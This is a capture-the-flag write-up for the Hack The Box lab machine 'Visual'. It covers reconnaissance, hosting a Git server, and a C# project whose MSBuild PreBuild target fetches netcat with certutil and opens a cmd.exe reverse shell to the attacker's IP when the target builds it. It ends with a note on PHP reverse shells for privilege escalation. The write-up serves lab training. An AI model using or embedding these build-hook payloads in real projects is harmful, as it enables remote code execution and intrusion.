Visual

IP of kali machine: 10.10.15.101

Scanning

Nmap

nmap -A -T4 -p- -v -sC visual.htb

Nmap scan report for visual.htb (10.10.11.234)
Host is up (0.050s latency).
Not shown: 65534 filtered tcp ports (no-response)
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.56 ((Win64) OpenSSL/1.1.1t PHP/8.1.17)
|_http-favicon: Unknown favicon MD5: 556F31ACD686989B1AFCF382C05846AA
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.1.17
|_http-title: Visual - Revolutionizing Visual Studio Builds
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2019 (89%)
Aggressive OS guesses: Microsoft Windows Server 2019 (89%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=256 (Good luck!)
IP ID Sequence Generation: Incremental

TRACEROUTE (using port 80/tcp)
HOP RTT      ADDRESS
1   48.74 ms 10.10.14.1
2   49.78 ms visual.htb (10.10.11.234)

NSE: Script Post-scanning.
Initiating NSE at 04:41
Completed NSE at 04:41, 0.00s elapsed
Initiating NSE at 04:41
Completed NSE at 04:41, 0.00s elapsed
Initiating NSE at 04:41
Completed NSE at 04:41, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 121.59 seconds
           Raw packets sent: 131236 (5.778MB) | Rcvd: 331 (59.448KB)

HTTP

Fuzzing directories reveal only uploads directory:

Try to upload a git project to test webapp:

After submit of GIT link we have a redirect to URL with this pattern: http://visual.htb/uploads/ae27098c16b9bddc8abd36eb1c64cc/

Info

PHP 8.1.17
Apache 2.4.56
Windows Server 2019

Gaining Access

Github url seems to not work, so create a GIT server and expose it using Apache on Kali linux attacker machine.

Install Git and Apache: sudo apt install git apache2 apache2-utils
Configuring Apache HTTP Server for Git: sudo a2enmod env cgi alias rewrite
Create a new directory /var/www/git for keeping all the Git repositories: sudo mkdir /var/www/git

Create a new Apache site configuration /etc/apache2/sites-available/git.conf for Git: sudo nano /etc/apache2/sites-available/git.conf

<VirtualHost *:80>
ServerAdmin webmaster@localhost

SetEnv GIT_PROJECT_ROOT /var/www/git
SetEnv GIT_HTTP_EXPORT_ALL
ScriptAlias /git/ /usr/lib/git-core/git-http-backend/

Alias /git /var/www/git

<Directory /usr/lib/git-core>
Options +ExecCGI -MultiViews +SymLinksIfOwnerMatch
AllowOverride None
Require all granted
</Directory>

DocumentRoot /var/www/html

<Directory /var/www>
Options Indexes FollowSymLinks MultiViews
AllowOverride None
Require all granted
</Directory>


ErrorLog ${APACHE_LOG_DIR}/error.log
LogLevel warn
CustomLog ${APACHE_LOG_DIR}/access.log combined
</VirtualHost>

Disable the default Apache site configuration: sudo a2dissite 000-default.conf
Enable the Git site configuration: sudo a2ensite git.conf
Restart Apache HTTP server sudo systemctl restart apache2

In order to bootstrap a new Git repository accessible over the Apache HTTP server, you will have to run a few commands. You don’t want to do the same thing over and over again just to create a new Git repository. So, I decided to write a shell script for that purpose. sudo nano /usr/local/bin/git-create-repo.sh

#!/bin/bash

GIT_DIR="/var/www/git"
REPO_NAME=$1

mkdir -p "${GIT_DIR}/${REPO_NAME}.git"
cd "${GIT_DIR}/${REPO_NAME}.git"

git init --bare &> /dev/null
touch git-daemon-export-ok
cp hooks/post-update.sample hooks/post-update
git config http.receivepack true
git update-server-info
chown -Rf www-data:www-data "${GIT_DIR}/${REPO_NAME}.git"
echo "Git repository '${REPO_NAME}' created in ${GIT_DIR}/${REPO_NAME}.git"

Add execute permission to the shell script: sudo chmod +x /usr/local/bin/git-create-repo.sh
Create a new Git repository test in the Git project root /var/www/git using the git-create-repo.sh: sudo git-create-repo.sh evil
Now you can clone the test Git repository as follows: git clone http://ip.of.kali.machine/git/evil.git

Prepare evil code

A quick review of Visual Code documentation revealed that it is possible to execute a predefined command before the actual build happens.

MSBuild's PreBuildEvent can be manipulated to execute custom commands before the actual build process starts. This is done by defining a custom target (PreBuild) that runs before the PreBuildEvent. Create a simple C# console project in Visual Studio and then modify the Pre-build event as follow:

<Project Sdk="Microsoft.NET.Sdk">

  <PropertyGroup>
    <OutputType>Exe</OutputType>
    <TargetFramework>net6.0</TargetFramework>
    <ImplicitUsings>enable</ImplicitUsings>
    <Nullable>enable</Nullable>
  </PropertyGroup>

  <Target Name="PreBuild" BeforeTargets="PreBuildEvent">
    <Exec Command="certutil.exe -urlcache -f http://10.10.15.101:8000/nc.exe nc.exe&#xD;&#xA;.\nc.exe -e cmd.exe 10.10.15.101 9999" />
  </Target>

</Project>

Prepare exploit tools

Run a python server inside /usr/share/windows-resources/binaries in order to deliver netcat to windows machine:

python3 -m http.server

Prepare the Evil git repository

Copy evil directory from Visual Studio Code project on Kali Machine
Copy all the contents from evil directory to evil.git directory: cp -Rf /home/kali/Downloads/evil/* evil.git
Temporary change ownership of evil.git: chown -Rf root:root evil.git
Initialize git inside evil.git: git init git checkout -b main git add . git config user.email "[email protected]" git config user.name "test" git commit -m "first commit"
Now we can upload it!

The payload force the Apache to grab netcat and then we will obtain a reverse shell:

Privilege Escalation

Typically, web and database services possess "ImpersonatePrivilege" permissions. These permissions can potentially be exploited to escalate privileges. Given that a PHP application is running on this machine, I decided to upload and trigger a PHP reverse shell insideC:\xampp\htdocs\uploads.